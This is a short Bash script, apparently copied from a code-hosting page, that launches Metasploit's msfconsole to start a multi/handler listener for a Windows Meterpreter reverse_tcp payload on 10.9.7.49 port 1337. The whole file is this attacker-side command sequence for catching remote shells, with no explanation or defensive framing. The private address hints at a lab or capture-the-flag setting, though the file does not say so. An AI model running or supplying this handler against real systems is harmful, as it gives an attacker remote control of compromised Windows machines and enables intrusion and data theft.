9 lines
140 B
Bash
9 lines
140 B
Bash
![]() |
msfconsole <<EOF
|
||
|
use multi/handler
|
||
|
set payload windows/meterpreter/reverse_tcp
|
||
|
set LHOST 10.9.7.49
|
||
|
set LPORT 1337
|
||
|
#show options
|
||
|
exploit
|
||
|
EOF
|